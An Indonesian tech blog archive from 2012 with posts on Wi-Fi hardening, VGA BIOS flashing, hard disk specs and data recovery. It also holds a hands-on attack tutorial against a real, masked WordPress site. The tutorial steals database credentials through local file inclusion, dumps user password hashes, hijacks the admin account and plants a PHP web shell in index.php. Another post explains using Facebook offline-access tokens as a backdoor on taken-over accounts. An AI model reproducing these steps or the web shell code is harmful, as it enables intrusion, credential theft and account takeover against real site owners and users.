Thursday, October 25, 2012

Jaringan nirkabel atau yang sering disebut dengan wireless network cukup mudah untuk di set up, dan juga terasa sangat nyaman, terutama jika kita menginginkan agar bisa berjalan jalan keliling rumah atau kantor dengan komputer portable tetapi tetap bisa tetap mengakses jaringan internet. Namun, karena wireless menggunakan gelombang, maka akan lebih mudah untuk di-hack daripada koneksi yang menggunakan kabel. Ada beberapa tips disini untuk mengamankan wireless network.
Adapun langkah langkahnya sebagai berikut
  1. Memakai Enkripsi. Enkripsi adalah ukuran security yang pertama, tetapi banyak wireless access points (WAPs) tidak menggunakan enkripsi sebagai defaultnya. Meskipun banyak WAP telah memiliki Wired Equivalent Privacy (WEP) protocol, tetapi secara default tidak diaktifkan. WEP memang mempunyai beberapa lubang di securitynya, dan seorang hacker yang berpengalaman pasti dapat membukanya, tetapi itu masih tetap lebih baik daripada tidak ada enkripsi sama sekali. Pastikan untuk men-set metode WEP authentication dengan “shared key” daripada “open system”. Untuk “open system”, dia tidak meng-encrypt data, tetapi hanya melakukan otentifikasi client. Ubah WEP key sesering mungkin, dan pakai 128-bit WEP dibandingkan dengan yang 40-bit.
  2. Gunakan Enkripsi yang Kuat. Karena kelemahan kelemahan yang ada di WEP, maka dianjurkan untuk menggunakan Wi-Fi Protected Access (WPA) juga. Untuk memakai WPA, WAP harus men-supportnya. Sisi client juga harus dapat men-support WPA tsb.
  3. Ganti Default Password Administrator. Kebanyakan pabrik menggunakan password administrasi yang sama untuk semua WAP produk mereka. Default password tersebut umumnya sudah diketahui oleh para hacker, yang nantinya dapat menggunakannya untuk merubah setting di WAP anda. Hal pertama yang harus dilakukan dalam konfigurasi WAP adalah mengganti password default tsb. Gunakan paling tidak 8 karakter, kombinasi antara huruf dan angka, dan tidak menggunakan kata kata yang ada dalam kamus.
  4. Matikan SSID Broadcasting. Service Set Identifier (SSID) adalah nama dari wireless network kita. Secara default, SSID dari WAP akan di broadcast. Hal ini akan membuat user mudah untuk menemukan network tsb, karena SSID akan muncul dalam daftar available networks yang ada pada wireless client. Jika SSID dimatikan, user harus mengetahui lebih dahulu SSID-nya agak dapat terkoneksi dengan network tsb.
  5. Matikan WAP Saat Tidak Dipakai. Cara yang satu ini kelihatannya sangat simpel, tetapi beberapa perusahaan atau individual melakukannya. Jika kita mempunyai user yang hanya terkoneksi pada saat saat tertentu saja, tidak ada alasan untuk menjalankan wireless network setiap saat dan menyediakan kesempatan bagi intruder untuk melaksanakan niat jahatnya. Kita dapat mematikan access point pada saat tidak dipakai.
  6. Ubah default SSID. Pabrik menyediakan default SSID. Kegunaan dari mematikan broadcast SSID adalah untuk mencegah orang lain tahu nama dari network kita, tetapi jika masih memakai default SSID, tidak akan sulit untuk menerka SSID dari network kita.
  7. Memakai MAC Filtering. Kebanyakan WAP (bukan yang murah murah tentunya) akan memperbolehkan kita memakai filter media access control (MAC). Ini artinya kita dapat membuat “white list” dari computer computer yang boleh mengakses wireless network kita, berdasarkan dari MAC atau alamat fisik yang ada di network card masing masing pc. Koneksi dari MAC yang tidak ada dalam list akan ditolak. Metode ini tidak selamanya aman, karena masih mungkin bagi seorang hacker melakukan sniffing paket yang kita transmit via wireless network dan mendapatkan MAC address yang valid dari salah satu user, dan kemudian menggunakannya untuk melakukan spoof. Tetapi MAC filtering akan membuat kesulitan seorang intruder yang masih belum jago jago banget.
  8. Mengisolasi Wireless Network dari LAN. Untuk memproteksi internal network kabel dari ancaman yang datang dari wireless network, perlu kiranya dibuat wireless DMZ atau perimeter network yang mengisolasi dari LAN. Artinya adalah memasang firewall antara wireless network dan LAN. Dan untuk wireless client yang membutuhkan akses ke internal network, dia haruslah melakukan otentifikasi dahulu dengan RAS server atau menggunakan VPN. Hal ini menyediakan extra layer untuk proteksi.
  9. Mengontrol Signal Wireless. 802.11b WAP memancarkan gelombang sampai dengan kira kira 300 feet. Tetapi jarak ini dapat ditambahkan dengan cara mengganti antenna dengan yang lebih bagus. Dengan memakai high gain antena, kita bisa mendapatkan jarak yang lebih jauh. Directional antenna akan memancarkan sinyal ke arah tertentu, dan pancarannya tidak melingkar seperti yang terjadi di antenna omnidirectional yang biasanya terdapat pada paket WAP setandard. Selain itu, dengan memilih antena yang sesuai, kita dapat mengontrol jarak sinyal dan arahnya untuk melindungi diri dari intruder. Sebagai tambahan, ada beberapa WAP yang bisa di setting kekuatan sinyal dan arahnya melalui config WAP tsb.
  10. Memancarkan Gelombang pada Frequensi yang Berbeda. Salah satu cara untuk bersembunyi dari hacker yang biasanya memakai teknologi 802.11b/g yang lebih populer adalah dengan memakai 802.11a. Karena 802.11a bekerja pada frekwensi yang berbeda (yaitu di frekwensi 5 GHz), NIC yang di desain untuk bekerja pada teknologi yang populer tidak akan dapat menangkap sinyal tsb.
Download Tulisan Lengkap: wewen_10tips
Sumber : http://ilmukomputer.org

Posted on 3:23 PM by Unknown

No comments

Monday, September 10, 2012

VGA mempunyai peranan yang sangat penting dalam menyokong tampilan grafis komputer. Oleh karena itu kinerjanya harus tetap dijaga agar tetap bisa bekerja secara maksimal. Salah satunya adalah dengan mengupdate BIOS VGA. Memang update BIOS VGA tidak semarak kegiatan update BIOS motherboard, karena selain jarang bermasalah, vendor VGA card juga jarang merilis BIOS untuk masing-masing produknya, alasannya karena tidak banyak VGA yang bermasalah ketika dipasang pada komputer, kecuali jika memang ditemukan masalah pada sistem kestabilan komputer ketika menggunakan VGA tersebut, vendor baru akan meluncurkan update BIOS.
Sebagai contoh. Beberapa waktu lalu, ada kasus di mana bila dipasangkan dengan motherboard yang menggunakan chipset VIA tertentu, sebuah kartu grafis chip S3 Savage dengan versi BIOS tertentu harus di-update BIOS-nya jika pemiliknya menggunakan sistem operasi Windows 98. Bila tidak dilakukan update BIOS pada VGA tersebut, permasalahan yang timbul adalah munculnya dreaded blue screen.
Namun hal-hal seperti tersebut di atas cukup jarang terjadi. Tidak seperti kebutuhan update BIOS pada motherboard yang lebih sering dibutuhkan. Update BIOS pada motherboard umumnya dilakukan untuk dapat meningkatkan stabilitas ataupun kompatibilitas terhadap perangkat-perangkat keluaran terbaru yang dapat dipasangkan pada motherboard tesebut.
Lalu, bagaimana jadinya kalau VGA yang digunakan adalah VGA onboard? Berhubung fitur grafis pada VGA onboard terintegrasi pada chipset motherboard, update pada BIOS motherboard dapat pula berfungsi sekaligus sebagai update VGA. Kita ambil contoh pada beberapa motherboard yang menggunakan chipset SiS630. Update BIOS yang dilakukan pada beberapa motherboard jenis ini, selain berfungsi untuk memperbaiki tingkat kompatibilitas pada prosesor ataupun media penyimpanan, update BIOS seri tertentu juga memberikan perbaikan terhadap grafis terintegrasinya.
Bagaimana Caranya?
Apakah Anda yakin Anda butuh untuk meng-update BIOS VGA Anda? Apakah kartu grafis tersebut bermasalah? Sebelum melakukan update BIOS VGA, yakinkan dulu bahwa permasalahan pada kartu grafis tersebut sudah tidak dapat diatasi oleh driver, software, ataupun setting lainnya seperti pada sistem operasi ataupun dari BIOS motherboard. Tidak juga karena panas yang berlebih pada chip VGA.
Untuk melakukan flash BIOS, minimal Anda membutuhkan software untuk flash BIOS dan tentunya BIOS update-nya. Sebaiknya, cari juga instruksi untuk meng-update BIOS kartu grafis tersebut. Biasanya, semuanya dapat di-download dari situs produsen kartu grafis yang bersangkutan.
Tidak seperti pada kartu grafis model lama, pada kartu grafis keluaran terkini jenis BIOS yang digunakan dapat di-update tanpa perlu mencopot chip BIOS-nya (dapat di-flash). Ini lebih mudah karena Anda tidak perlu memprogram ulang chip BIOS dengan bantuan BIOS/ROM programmer. Berikut ini adalah langkah umum yang dapat digunakan untuk melakukan flash BIOS VGA:
  1. Setelah Anda men-download BIOS dan software flash-nya, restart-lah komputer Anda ke mode MS-DOS. Kalau sistem operasi Anda Windows 2000, ME, ataupun XP, gunakan bootable disk untuk memasuki mode MS-DOS.
  2. Cari lokasi di mana Anda menyimpan file-file untuk update BIOS tadi. Misalnya di A:\ atau di C:\
  3. Setelah Anda masuk ke folder tersebut, jalankan perintah “nvflash f (nama file BIOS)” atau “atiflash -p (nama file BIOS)”. Sebagai contoh, kalau nama file BIOS baru tersebut adalah testing.rom dan ada di A:\, perintahnya menjadi A:\nvflash f testing.rom. Atau A:\atiflash -p testing.rom. Ada baiknya Anda backup dulu BIOS yang lama untuk antisipasi. Untuk penjelasannya, biasanya Anda tinggal menambahkan perintah “/?” setelah nvflash atau atiflash.
  4. Setelah selesai, boot ulang PC Anda.
Langkah-langkah melakukan update BIOS VGA ini terkadang sedikit berbeda antara satu kartu grafis dengan yang lainnya. Sebaiknya cari petunjuk dari situs produsennya. Yang perlu diingat adalah, melakukan update BIOS pada VGA kurang lebih sama resikonya dengan melakukan update BIOS pada motherboard. Kalau kurang teliti, permasalahan pada VGA bisa semakin parah atau malah rusak total. Tetapi umumnya kegagalan update BIOS VGA dapat diatasi dengan bantuan VGA card lain yang dipasang di motherboard.
Satu hal lagi, update BIOS VGA jarang ada hubungannya dengan peningkatan kinerja (kecepatan ataupun kualitas gambar). Kalau yang Anda inginkan adalah peningkatan kinerja seperti itu, yang perlu Anda lakukan adalah update driver chip VGA, bukan update BIOS. Kecuali kalau yang Anda maksud adalah melakukan softmod pada VGA (menukar BIOS standar dengan BIOS kartu grafis lain dengan spek yang lebih tinggi). Untuk softmodding BIOS VGA, akan dibahas pada subject yang berbeda.

sumber : http://oprekpc.com/index.php?id=view&aid=19

Posted on 4:04 PM by Unknown

No comments

Sebelum membeli harddisk kita harus paham terlebih dahulu spesifikasi harddisk yang hendak dibeli. Karena spesifikasi harddisk tersebut yang nantinya akan mempengaruhi performa dari komputer kita. Harddisk dengan spesifikasi bagus selain akan bagus diperforma juga biasanya akan lebih awet. Jadi sebelum membeli harddisk, tentukan dulu spesifikasi yang hendak dibeli. Apa saja spesifikasi harddisk yang perlu diutamakan ? Kali ini sobatpc.com akan sharing tentang spesifikasi harddisk yang perlu diperhatikan dalam membeli harddisk.
  1. Tipe hardisk Merupakan spesifikasi hardisk yang pertama kita lihat. Untuk tipe hardisk ini ada bermacam-macam seperti ATA (IDE), SATA, SCSI dan SAS.
  2. Kapasitas hardisk
    Kapasitas hardisk adalah ukuran penyimpanan sebuah hardisk. Kapasitas hardisk merupakan spesifikasi hardisk kedua yang harus kita lihat ketika membeli sebuah hardisk. Saat ini kapasitas hardisk yang tersedia dipasaran adalah 80 GB, 160 GB, 250 Gb, 500 GB dan 1 TB.
  3. Form Factor
    Spesifikasi hardisk yang ketiga adalah form factor, form factor merupakan ukuran fisik sebuah hardisk yang dilambangkan dengan garis tengah platter yang digunakan. Pada saat ini dikenal 2 macam form factor hardisk, yaitu ukuran 3,5 inchi dan 2,5 inchi.
  4. Kecepatan putaran hardisk
    Kecepatan hardisk pada dasarnya merupakan ukuran kecepatan platter hardisk untuk melakukan satu putaran dalam satu menit sehingga dinyatakan dengan Rotation Per Minute (RPM). Semakin tinggi putaran ini berarti konerja hardisk semakin baik.
  5. Cache buffer
    Spesifikasi hardisk yang terakhir yang dapat kita lihat dalam memilih sebuah hardisk adalah cache buffer. Cache buffer merupakan memeri yang diintegrasikan didalam sebuah hardisk. Cache buffer berfungsi untuk menyimpan data yang sring diminta oleh RAM, sehingga tidak perlu di ambil dari platter. Semakin besar cache buffer ini berarti transfer data akan lebih cepat sehingga kinerja hardisk juga akan meningkat.

sumber : http://www.catatanteknisi.com/2010/02/mengenal-spesifikasi-hardisk.html

Posted on 4:03 PM by Unknown

No comments

Pada tutorial kali ini, kita akan berkenalan dengan yang namanya local file
inclusion yang kurang lebih artinya adalah kondisi dimana kita bisa membaca
atau mengambil file yang ada di server berdasarkan permission yang dimiliki.
Secara sedrhana, kita bisa mencari LFI menggunakan google dork seperi ini:
-------------------------------------------------------------------------------

inurl:"download.php?file="

-------------------------------------------------------------------------------
Karena tutorial sifatnya hanya sebagai pengantar saja, maka saya hanya men-
jelaskan dasar-dasarnya saja. Silakan dikembangkan sendiri untuk eksploitasi
yang lebih lanjut, misalnya hingga mendapatkan akses root menggunakan local
root exploit. Oke, langsung saja, berikut ini adalah contoh situs target yang
rentan terhadap LFI:
-------------------------------------------------------------------------------

http://www.*******.***/en/download.php?file=

-------------------------------------------------------------------------------
Pertama kita akan mencari letak dari root direktori webnya dimana kita bisa
mendapatkan dokumen "index.php" menggunakan direktori traversal:
-------------------------------------------------------------------------------

$ curl -s 'http://www.*******.***/en/download.php?file=index.php'
$ curl -s 'http://www.*******.***/en/download.php?file=../index.php'
<?php
// Silence is golden.
?>
$ curl -s 'http://www.*******.***/en/download.php?file=../../index.php'
<?php
//enable gzip
ob_start("ob_gzhandler");
/**
* Front to the WordPress application. This file doesn't do anything, but loads
* wp-blog-header.php which does and tells WordPress to load the theme.
*
* @package WordPress
*/

/**
* Tells WordPress to load the WordPress theme and output it.
*
* @var bool
*/
define('WP_USE_THEMES', true);

/** Loads the WordPress Environment and Template */
require('./wp-blog-header.php');
?>

-------------------------------------------------------------------------------
Nah, sekarang kita sudah menemukan indexnya. Kita perlu melakukan traversal se-
banyak 2 kali untuk sampai ke document root webnya. Dari file indexnya kita bi-
sa mendapatkan informasi bahwa situsnya menggunakan wordpress, berarti konfigu-
rasi koneksi ke databasenya bisa dilihat pada file "wp-config.php"
-------------------------------------------------------------------------------

$ curl -s 'http://www.*******.***/en/download.php?file=../../wp-config.php'
<?php

//--snip--

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('WP_CACHE', true); //Added by WP-Cache Manager
define('DB_NAME', '**************');

/** MySQL database username */
define('DB_USER', '************');

/** MySQL database password */
define('DB_PASSWORD', '********');

/** MySQL hostname */
define('DB_HOST', 'localhost');

/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8');

/** The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', '');

//--snip--


-------------------------------------------------------------------------------
Dari file "wp-config.php" tersebut, kita bisa mendapatkan informasi user dan
password serta nama dari database yang digunakan. Selanjutnya, kita akan me-
lakukan scanning ke port 3306 yang umum digunakan oleh service MySQL untuk
memeriksa apakah portnya terbuka.
-------------------------------------------------------------------------------

$ nmap -Pn -p 3306 www.*******.***

Starting Nmap 5.51.5 ( http://nmap.org ) at 2011-12-02 23:14 WIT
Nmap scan report for www.*******.*** (110.4.45.176)
Host is up (0.024s latency).
rDNS record for 110.4.45.176: *********.**********.***
PORT STATE SERVICE
3306/tcp open mysql

Nmap done: 1 IP address (1 host up) scanned in 0.58 seconds

-------------------------------------------------------------------------------
Ternyata portnya terbuka untuk umum. Kita akan mencoba melakukan koneksi ke da-
tabasenya menggunakan username dan password yang terdapat pada file "wp-config"
yang kita peroleh pada langkah sebelumnya.
-------------------------------------------------------------------------------

$ mysql -C -A --host=www.*******.*** --user=************ --password=********
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 53370756
Server version: 5.0.92-community MySQL Community Edition (GPL)

Copyright (c) 2000, 2010, Oracle and/or its affiliates. All rights reserved.
This software comes with ABSOLUTELY NO WARRANTY. This is free software,
and you are welcome to modify and redistribute it under the GPL v2 license

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql>

-------------------------------------------------------------------------------
Kali ini kita beruntung, kita bisa melakukan koneksi dari luar menggunakan user
name dan password tadi. Langkah selanjutnya adalah memeriksa apa saja database
yang bisa kita akses
-------------------------------------------------------------------------------

mysql> show databases;
ERROR 2006 (HY000): MySQL server has gone away
No connection. Trying to reconnect...
Connection id: 53371955
Current database: *** NONE ***

+--------------------+
| Database |
+--------------------+
| information_schema |
| ************** |
| ************** |
| ************** |
| ************** |
| ************ |
| ************ |
| ************** |
| ************ |
| ************ |
| ************ |
| ************ |
+--------------------+
12 rows in set (0.26 sec)

-------------------------------------------------------------------------------
Kita bisa mengakses beberapa database. Coba kita pilih salah satu dan melihat
apa saja tabel yang ada pada database yang kita pilih tersebut.
-------------------------------------------------------------------------------

mysql> use **************;
Database changed
mysql> show tables;
+-----------------------------+
| Tables_in_************** |
+-----------------------------+
| tblClicks |
| wp_centremeta |
| wp_commentmeta |

--// snip //--

| wp_usermeta |
| wp_users |
| wp_yarpp_keyword_cache |
| wp_yarpp_related_cache |
+-----------------------------+
37 rows in set (0.03 sec)

-------------------------------------------------------------------------------
Sasaran berikutnya adalah tabel "wp_users" yang menyimpan informasi login user
yang ada di situs korban. Mari kita enumerasi perlahan biar tidak mencurigakan.
-------------------------------------------------------------------------------

mysql> describe wp_users;
+---------------------+---------------------+------+-----+---------------------+----------------+
| Field | Type | Null | Key | Default | Extra |
+---------------------+---------------------+------+-----+---------------------+----------------+
| ID | bigint(20) unsigned | NO | PRI | NULL | auto_increment |
| user_login | varchar(60) | NO | MUL | | |
| user_pass | varchar(64) | NO | | | |
| user_nicename | varchar(50) | NO | MUL | | |
| user_email | varchar(100) | NO | | | |
| user_url | varchar(100) | NO | | | |
| user_registered | datetime | NO | | 0000-00-00 00:00:00 | |
| user_activation_key | varchar(60) | NO | | | |
| user_status | int(11) | NO | | 0 | |
| display_name | varchar(250) | NO | | | |
+---------------------+---------------------+------+-----+---------------------+----------------+
10 rows in set (0.03 sec)

mysql> select count(*) from wp_users;
+----------+
| count(*) |
+----------+
| 10 |
+----------+
1 row in set (0.02 sec)

mysql> select user_login, user_pass, user_email from wp_users;
+--------------+------------------------------------+-------------------------------------+
| user_login | user_pass | user_email |
+--------------+------------------------------------+-------------------------------------+
| admin | $P$B252Tg0ycfGseWL2muqsN4YJJcdKlz1 | info@*******.*** |
| ******** | $P$BD3kwIwHvq759PXIZGpWtXEoy9tzYs0 | *******.********@**************.*** |
| **** | $P$B4zZhrrfWVDZG9kHqfEjg5RvXBoVtc/ | ****.****@***********.com |
| ****** | $P$BADMy4rrWYJqJkXBG/5nMw9UkNLcLg1 | ******.****@**************.com |
| *****.***** | $P$Bs6j8LOb5srZG66fA2jZM5NDLdtm7s0 | *****.*****@**************.com |
| ****.**** | $P$BQ1Drqyk8vgqWUQrxiFqrd2a3tZIZv. | ****.******@**************.com |
| *******.**** | $P$Bx6PCPONVUK0ATqMOKBClAq6HZVUsJ. | ********@*******.*** |
| ******* | $P$BKQi5YLQoKCNPhPnoQn3EcPDSZoUqt. | **.*******@*****.com |
| ****.**** | $P$BuzEJ7saFcPYLYeNl1k4jgvGBgMLwD/ | ****.****@*******.*** |
| ******.***** | $P$BQWl6o8iHdaNPuQydDyblER.tHpf1Z. | ******.*****@**************.com |
+--------------+------------------------------------+-------------------------------------+
10 rows in set (0.14 sec)

mysql> quit;
Bye
$
$ ##### nah, sekarang kita bisa men-dump databasenya menggunakan mysqldump
$
$ mysqldump -v -q --compact --compress --host=www.*******.*** --user=************ --password=******** ************** wp_users > ******_wp_users.sql
-- Connecting to www.*******.***...
-- Retrieving table structure for table wp_users...
-- Sending SELECT query...
-- Retrieving rows...
-- Disconnecting from www.*******.***...
$
$ ##### pada perintah di atas, kita hanya mengambil tabel "wp_users" pada database "**************"
$
$ ##### selanjutnya kita akan mencoba dua buah fungsi mysql untuk membaca dan menulis file
$
$ mysql -C -A --host=www.*******.*** --user=************ --password=********
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 53377182
Server version: 5.0.92-community MySQL Community Edition (GPL)

Copyright (c) 2000, 2010, Oracle and/or its affiliates. All rights reserved.
This software comes with ABSOLUTELY NO WARRANTY. This is free software,
and you are welcome to modify and redistribute it under the GPL v2 license

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> select load_file('/etc/passwd');
+--------------------------+
| load_file('/etc/passwd') |
+--------------------------+
| NULL |
+--------------------------+
1 row in set (0.03 sec)

mysql> select 'test' into outfile '/tmp/chk';
ERROR 1045 (28000): Access denied for user '************'@'%' (using password: YES)
mysql>
mysql> quit;
Bye
$

-------------------------------------------------------------------------------
Ternyata kita tidak bisa menulis dan membaca file karena ada batasan permission
dari servernya. Oke, kita akan menggunakan skenario berikut ini untuk masuk ke
admin panel wordpress pada situs korban:

1. ganti alamat email salah satu user yang merupakan administrator.
2. buka halaman login wordpressnya (alamat_situs_korban/wp-admin)
3. gunakan fitur forget password
4. verifikasi email yang dikirim
5. login dengan password baru
6. kembalikan alamat email yang diubah pada langkah no 1

setelah login, kita bisa mengakses fitur upload yang bisa kita gunakan untuk
mengupload php shell. tapi pada tutorial kali ini, kita tidak akan menggunakan
fitur tersebut, melainkan menggunakan fitur yang ada di admin panel situsnya
yaitu edit source. kita akan mengedit file "index.php" nya sehingga jika kita
menambahkan parameter tertentu, maka file indexnya akan mengeksekusi perintah
yang kita berikan. berikut ini adalah snippet kode awal pada file "index.php"
-------------------------------------------------------------------------------

<?php
/* Short and sweet */
define('WP_USE_THEMES', true);
require('./wp-blog-header.php');
?>

-------------------------------------------------------------------------------
dan berikut ini adalah file "index.php" setelah kita menyisipkan kode yang di
comot dari php shell r57:
-------------------------------------------------------------------------------

<?php
$cfe = $_GET['c'];
if (!empty($cfe))
{
if(@function_exists('exec'))
{
@exec($cfe,$res);
$res = join("\n",$res);
} elseif(@function_exists('shell_exec')) {
$res = @shell_exec($cfe);
} elseif(@function_exists('system')) {
@ob_start();
@system('$cfe');
$res = @ob_get_contents();
@ob_end_clean();
} elseif(@function_exists('passthru')) {
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
echo "<pre>\n".htmlspecialchars($res)."</pre>\n";
exit();
}

/* Short and sweet */
define('WP_USE_THEMES', true);
require('./wp-blog-header.php');
?>

-------------------------------------------------------------------------------
setelah menambahkan beberapa baris di atas, kita bisa memberikan perintah me-
lalui parameter seperti berikut ini:

http://*******.*******.***/index.php?c=ls%20-la

dan hasilnya seperti ini:
-------------------------------------------------------------------------------

total 200
drwxr-x--- 7 ****** nobody 4096 Dec 2 14:26 .
drwxr-x--- 37 ****** nobody 4096 Nov 10 17:13 ..
-rw------- 1 ****** ****** 13 Nov 27 04:45 .ftpquota
-rw-r--r-- 1 ****** ****** 430 Aug 27 2010 .htaccess
drwxr-xr-x 2 ****** ****** 4096 May 8 2007 MM_CASETEST4291
drwxr-xr-x 2 ****** ****** 4096 May 7 2007 cgi-bin
-rw-r--r-- 1 ****** ****** 1924 Dec 2 13:03 error_log
-rw------- 1 ****** ****** 641 Dec 2 13:21 index.php
-rw-r--r-- 1 ****** ****** 15127 May 8 2007 license.txt
-rw-r--r-- 1 ****** ****** 7711 May 8 2007 readme.html
drwxr-xr-x 4 ****** ****** 4096 Jul 5 2007 wp-admin
-rw------- 1 ****** ****** 1914 May 8 2007 wp-atom.php
-rw------- 1 ****** ****** 865 May 8 2007 wp-blog-header.php
-rw------- 1 ****** ****** 2729 May 8 2007 wp-comments-post.php
-rw------- 1 ****** ****** 3689 May 8 2007 wp-commentsrss2.php
-rw------- 1 ****** ****** 895 May 8 2007 wp-config.php
drwxr-xr-x 5 ****** ****** 4096 Mar 13 2008 wp-content
-rw------- 1 ****** ****** 855 May 8 2007 wp-cron.php
-rw------- 1 ****** ****** 120 May 8 2007 wp-feed.php
drwxr-xr-x 4 ****** ****** 4096 May 8 2007 wp-includes
-rw------- 1 ****** ****** 1395 May 8 2007 wp-links-opml.php
-rw------- 1 ****** ****** 15891 May 8 2007 wp-login.php
-rw------- 1 ****** ****** 5090 May 8 2007 wp-mail.php
-rw------- 1 ****** ****** 291 May 8 2007 wp-pass.php
-rw------- 1 ****** ****** 2229 May 8 2007 wp-rdf.php
-rw------- 1 ****** ****** 251 May 8 2007 wp-register.php
-rw------- 1 ****** ****** 1240 May 8 2007 wp-rss.php
-rw------- 1 ****** ****** 2041 May 8 2007 wp-rss2.php
-rw------- 1 ****** ****** 9461 May 8 2007 wp-settings.php
-rw------- 1 ****** ****** 3537 May 8 2007 wp-trackback.php
-rw------- 1 ****** ****** 39039 May 8 2007 xmlrpc.php

-------------------------------------------------------------------------------
selanjutnya tinggal mengembangkan apa yang kita peroleh tersebut. misalnya
melakukan back connect lalu dari sana mencoba melakukan eksploitasi lokal
menggunakan local root exploit.

sekian tutorial kali ini. semoga bermanfaat :)
-------------------------------------------------------------------------------



https://fbcdn-photos-a.akamaihd.net/hphotos-ak-ash4/384902_109532092497046_100003207662504_54898_1667459373_n.jpg



https://fbcdn-photos-a.akamaihd.net/hphotos-ak-snc7/384825_109539722496283_100003207662504_54928_1217640632_n.jpg

Posted on 3:57 PM by Unknown

No comments

Pengalaman kehilangan data akibat keteledoran dalam melakukan installasi linux dan
windows di dalam pembagian partisi mungkin pernah di alami oleh newbie seperti
saya..akibatnya data-data penting bisa hilang seiring dengan kesalahan memilih
partisi..hal ini pernah terjadi ketika dulu saya salah klik partisi dan keburu ke
install..ehehe dari keteledoran itu akkhirnya saya mulai berpikir gimana caranya
mengembalikan data-data yg hilang walaupun gak semua bisa di balikin.. iseng
browshing dan ngobrol sama yg lebih ahli ternyata saya mulai mencari gimana cara
mengembalikan data saya...


saya cuma sharing step by stepnya buat balikin data-data di partisi yg hilang
tersebut..

oia apaan sih magicrescue ?

Magicresceu adalah aplikasi opensource yg biasa digunakan untuk forensic data
(merecovery data hardisk atau flash disk, mungkin yg udah pada dewa pernah denger..:D

karena nyobanya waktu itu di ubuntu stepnya sbb :

1. install dulu applikasinya (Magicrescue) nya

cmd :

$ sudo apt-get install magicrescue


2. setelah installasi kita baca dulu cara penggunaaannya


cmd :


$ sudo magicrescue --help

3. pastiin sebelum nyobain magicrescue, kalian pastiin DMA (Direct Memory Access)
anda dan optimasi terhadap hardware sudah aktif..biar proses recovery data bisa
lebih cepet.. kalau di linux bisa menggunakan (hdparm)..untuk keterangan
DMA bisa di baca di http://en.wikipedia.org/wiki/Direct_memory_access


cmd :

sudo hdparm -d 1 -c 1 -u 1 /dev/hdb


ket : -d (


4. selanjutnya kita langsung coba..recovery datanya..karna waktu itu saya
hilang data di sda7 jadi device partisinya saya di sda7,kalau masah
recovery tergantung anda di sda (sda yg ingin anda recovery datanya)..

ex :

karena waktu itu saya dikasih banyak vidoe tutorial extensinya .avi jadi
perintahnya sbb :

sudo magicrescue -r .avi -d /tmp/data /dev/sda7

ket :

option -r (recovery) extention file
option -d (directory tempat menaruh filenya yg udah di recovery)
/dev/sda7 adalah partisi data saya yg sedang di recovery (soal
partisi tergantung partisi yg anda ingin recovery)


5. sekian dulu ya..heheh untuk lebih paham bisa di install sesuai OS
nya..:D

Posted on 3:55 PM by Unknown

No comments

Pendahuluan

Tutorial ringan kali ini akan membahas mengenai facebook graph API yang digunakan oleh kebanyakan aplikasi untuk berkomunikasi dengan objek yang ada pada facebook. Secara sederhana, kali ini kita akan membuat seolah-olah kita menggunakan aplikasi tertentu untuk membuat posting pada facebook, misalnya Blackberry. Jadi status update kita nantinya akan terlihat "via Blackberry".


Langkah-langkah

  • Pertama, cari ID aplikasi yang kita inginkan, caranya adalah dengan menggunakan dork berikut ini pada google

inurl:"http://www.facebook.com/apps/application.php?id="

  • Setelah menemukan ID aplikasi yang kita inginkan, misalnya ID untuk Blackberry adalah 2254487659 maka kita akan memasukkan ID tersebut pada URL berikut (ganti bagian _ID_APLIKASI_). Selain itu, kita hanya menggunakan 2 bagian "permission" pada parameter "scope". Untuk daftar lengkap dari permission, bisa dilihat pada https://developers.facebook.com/docs/reference/api/permissions/

https://graph.facebook.com/oauth/authorize?client_id=_ID_APLIKASI_&redirect_uri=http://www.facebook.com/connect/login_success.html&scope=publish_stream,offline_access&response_type=token

  • Contoh penggunaan dari langkah di atas adalah sebagai berikut:

https://graph.facebook.com/oauth/authorize?client_id=2254487659&redirect_uri=http://www.facebook.com/connect/login_success.html&scope=publish_stream,offline_access&response_type=token

  • Copy dan paste link di atas pada browser, dan jika perlu nanti ada permintaan untuk meng-approve aplikasinya. Setelah di-approve, maka akan ada tulisan "Success" pada web browser dan pada bagian web address akan ada link seperti ini:

https://www.facebook.com/connect/login_success.html?access_token=_ACCESS_TOKEN_&expires_in=86886

  • Nah, bagian _ACCESS_TOKEN_ ini yang kita butuhkan untuk melakukan posting ke facebook. Jika diperhatikan, pada link di atas, parameter "expires_in" nilainya bukan 0 yang berarti access tokennya harus direquest lagi jika sudah expired. Ada beberapa aplikasi yang nilai "expires_in" adalah 0, artinya access_tokennya bisa digunakan berulang-ulang tanpa harus membuat request lagi. Untuk meng-update status, kita bisa menggunakan perintah ini di terminal:

curl -F 'access_token=_ACCESS_TOKEN_' -F 'message=_STATUS_' https://graph.facebook.com/me/feed

  • Pada contoh di atas, kita mengganti _ACCESS_TOKEN_ sesuai dengan access_token yang diperoleh dari langkah sebelumnya. Sedangkan _STATUS_ adalah status update yang akan kita tampilkan di wall.

  • Untuk melakukan posting ke wall seseorang atau ke group, kita cukup mengganti url graph facebook dengan ID / nama orang yang wallnya ingin kita tulisi, misalnya untuk posting ke group RNDC:

curl -F 'access_token=_ACCESS_TOKEN_' -F 'message=_STATUS_' https://graph.facebook.com/203523726370149/feed

  • Untuk posting link, kita tinggal menambahkan parameter "link" seperti ini:

curl -F 'access_token=_ACCESS_TOKEN_' -F 'link=_LINKNYA_DI_SINI_' -F 'message=_STATUS_' https://graph.facebook.com/203523726370149/feed


Penutup

Dengan memanfaatkan fitur facebook graph API, kita bisa membuat backdoor pada akun seseorang yang sudah kita takeover. Caranya adalah dengan menggunakan aplikasi yang bisa menggunakan scope "offline_access" sehingga kita cukup sekali saja me-request token.

Sekian tutorial singkat kali ini, semoga bermanfaat. Terima kasih kepada Tuhan Yang Maha Esa dan Anda yang telah membaca tutorial singkat ini.

Posted on 3:53 PM by Unknown

No comments

1. Cek informasi iPhone anda dengan menggunakan "iphonecarrierchecker"



2. Download firmwares di >> http://www.iphoneleaks.net/firmwares/
yang saya gunakan adalah "iPhone2,1_5.1.1_9B206_Restore.ipsw"

3. Download Tools JailBreak "sn0wbreeze & redsn0w"

